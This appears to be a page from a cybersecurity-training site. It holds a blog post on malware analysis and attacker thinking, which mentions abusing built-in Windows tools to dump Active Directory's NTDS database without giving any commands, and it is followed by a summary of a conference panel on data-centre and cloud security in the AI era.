TrainSec courses focus on building this mental model. Once you understand these internals, techniques like hollowing, injection, and evasion stop being magic tricks and start becoming engineering problems you can reason about, improve, and detect.
This is exactly the gap TrainSec aims to close.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering.
Subscribe for free and continue learning with us: https://trainsec.net/library
In a recent discussion between Yaniv Hoffman and me, a core idea came back again and again: strong defense in cybersecurity starts with understanding the attacker’s mindset. Malware analysis, EDR evasion, and modern attack chains cannot be learned only from theory or from a single defensive angle. They require thinking across roles and understanding how real attackers operate in practice.
This approach is at the heart of how I teach and research malware, and it is highly relevant for students and researchers learning at TrainSec Academy.
I explained that effective defenders must learn to think like attackers. To detect and stop real threats, you need to understand why attackers choose certain techniques, how they bypass security tools, and where defenders usually make assumptions.
Malware analysis sits between blue and red teams. By reversing malware and studying real tradecraft, defenders learn how attackers reuse code, copy techniques from known ransomware groups, and adapt quickly. This is not theory. It is exactly how attackers learn from each other in the real world.
For TrainSec students, this means that malware analysis is not just about reading indicators or signatures. It is about understanding intent, design decisions, and abuse of legitimate system behavior.
One of the strongest points raised in the discussion is that attackers often succeed by using very simple methods. Instead of advanced shellcode or complex loaders, many attacks rely on trusted, signed system tools that defenders ignore.
I demonstrated how built-in Windows utilities can be abused to fully compromise Active Directory by dumping the NTDS database. No custom malware, no suspicious API calls, and no obvious indicators. From an EDR point of view, everything looks like a normal administrative action.
This highlights a critical lesson for security researchers and SOC analysts: if you only look for complex behavior, you will miss the attacks that matter most.
The discussion also covers several trends in how malware has changed in recent years.
For TrainSec students, these trends explain why learning internals, operating systems, and detection logic is essential. Tools change, but attacker thinking patterns stay consistent.
This philosophy aligns directly with the learning paths at TrainSec, where students are guided step by step from fundamentals to advanced research topics.
This discussion reflects how TrainSec approaches cybersecurity education. Courses are designed to teach how systems really work, how attackers abuse them, and how defenders can respond with informed detection and prevention.
For students and researchers, this mindset helps bridge the gap between theory and real world security work. It prepares them not only to detect threats, but to understand them deeply and adapt as attackers evolve.
I appreciate Yaniv Hoffman hosting me for this great discussion. Check out his YouTube channel here:
In a recent panel of industry experts convened at the annual Data Centers & Cloud 2025 event, we explored how data-centres and cloud infrastructures are preparing for the AI era and why the sleep-at-night factor may be under threat for many organizations.
As AI and data-intensive workloads move to the fore, traditional data-centre and cloud infrastructure are under unprecedented pressure. The panel, which included cloud and cyber-security leaders from government, healthcare, and enterprise, examined how legacy installations, hybrid models, regulation, infrastructure scaling, and the human factor combine to create a volatile mix.
In the AI era, the data-centre is no longer a simple physical facility. It is a dynamic hybrid ecosystem of compute, cloud services, accelerators, and identity flows. Security leaders cannot sleep soundly, but with the right architecture and mindset, they can stay ahead of the threat curve.
Based on a panel discussion at Data Centers & Cloud 2025 and the original Hebrew article published by PC.co.il.